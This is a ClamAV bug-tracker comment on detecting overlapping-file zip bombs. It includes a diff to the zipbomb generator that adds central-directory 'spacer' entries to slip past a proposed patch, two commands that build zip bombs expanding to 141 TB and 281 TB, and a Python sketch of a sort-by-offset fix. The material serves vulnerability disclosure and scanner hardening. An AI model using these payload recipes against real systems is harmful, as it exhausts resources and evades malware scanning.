Originally posted at https://bugzilla.clamav.net/show_bug.cgi?id=12356#c6
David Fifield 2019-08-05 18:32:34 EDT

(In reply to Micah Snyder from comment #4)
> I have a patch that records the size and offset of the previous file found
> in the zip when performing extraction using the central directory. It
> compares these values with the current file to determine if the local file
> header data is overlapping.

I think the technique of comparing only successive central directory entries can be fooled, for instance by inserting "spacer" files in the central directory between the bomb files. For example, try this modification to the zipbomb source code:

@@ -664,6 +664,13 @@ def write_zip_quoted_overlap(f, num_files, compressed_size=None, max_uncompresse
         central_directory.append(CentralDirectoryHeader(offset, record.header))
         offset += f.write(record.header.serialize(zip64=zip64))
         offset += f.write(record.data)
+    spacers = []
+    for i in range(num_files - 1):
+        header = LocalFileHeader(0, 0, binascii.crc32(b""), b"spacer" + filename_for_index(i), compression_method=0)
+        spacers.append(CentralDirectoryHeader(offset, header))
+        offset += f.write(header.serialize(zip64=zip64))
+        offset += f.write(b"")
+    central_directory = [x for y in zip(central_directory, spacers) for x in y] + central_directory[len(spacers):]
 
     cd_offset = offset
     for cd_header in central_directory:

Generate a zip file using the command:

./zipbomb --mode=quoted_overlap --num-files=32767 --max-uncompressed-size=4292788525 > spaced.zip

It unzips to 141 TB, still pretty big. The order of files as laid out in the zip file is

4293868383 0
4293868352 1
4293868321 2
4293868290 3
...
4292788504 O95
4292788471 O96
0 spacer0
0 spacer1
0 spacer2
0 spacer3
...
0 spacerO95

But the order they appear in the central directory is

4293868383 0
0 spacer0
4293868352 1
0 spacer1
4293868321 2
0 spacer2
4293868290 3
0 spacer3
...
4292788504 O95
0 spacerO95
4292788471 O96

One way to deal with this would be to first make a pass over the central directory and sort the files by their file_local_offset. Then it's safe to compare file n only against file n+1. (I didn't actually try this against clamscan -- sorry if there's already a sort somewhere that I didn't notice.)

Additionally, the patches only detect overlapping files if cur_file_local_offset > prev_file_local_offset or prev_file_local_offset > cur_file_local_offset, not when prev_file_local_offset == cur_file_local_offset. It may fail when files overlap exactly, as in https://www.bamsoftware.com/hacks/zipbomb/#overlap. Here is a recipe to make another test case (7 MB → 281 TB):

./zipbomb --mode=full_overlap --num-files=65534 --max-uncompressed-size=4294967295 > overlap.zip
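
To illustrate the sort-then-compare idea and the equal-offset case, here is a rough Python sketch. It is not ClamAV code and not part of zipbomb: the Entry type, its length field (local header plus file data, assumed to be greater than zero), and both function names are made up for this example. It only models offsets and lengths, not real zip parsing.

```python
from typing import List, NamedTuple


class Entry(NamedTuple):
    """Hypothetical, simplified stand-in for one central directory entry."""
    name: str
    local_offset: int  # offset of the local file header in the zip
    length: int        # bytes covered by local header + file data (assumed > 0)


def overlaps_adjacent(entries: List[Entry]) -> bool:
    """Compare each entry only with the one listed just before it."""
    for prev, cur in zip(entries, entries[1:]):
        lo, hi = sorted((prev, cur), key=lambda e: e.local_offset)
        if lo.local_offset + lo.length > hi.local_offset:
            return True
    return False


def overlaps_sorted(entries: List[Entry]) -> bool:
    """Sort by local offset first, then compare file n against file n+1."""
    ordered = sorted(entries, key=lambda e: e.local_offset)
    for prev, cur in zip(ordered, ordered[1:]):
        # Strict '>' also fires when both offsets are equal (exact overlap),
        # because every entry is assumed to have a non-zero length.
        if prev.local_offset + prev.length > cur.local_offset:
            return True
    return False


# Three "quoted" bomb files that overlap each other, interleaved in the
# central directory with small spacer files stored after them.
interleaved = [
    Entry("0", 0, 1000),
    Entry("spacer0", 1000, 40),
    Entry("1", 100, 900),
    Entry("spacer1", 1040, 40),
    Entry("2", 200, 800),
]

# Two files whose local headers sit at exactly the same offset.
exact = [Entry("a", 0, 100), Entry("b", 0, 100)]

print(overlaps_adjacent(interleaved))  # False: the spacers hide the overlap
print(overlaps_sorted(interleaved))    # True
print(overlaps_sorted(exact))          # True
```

Once the entries are sorted by offset, checking neighbours is enough: if any two entries overlap, the earlier one must also overlap the entry that immediately follows it in sorted order.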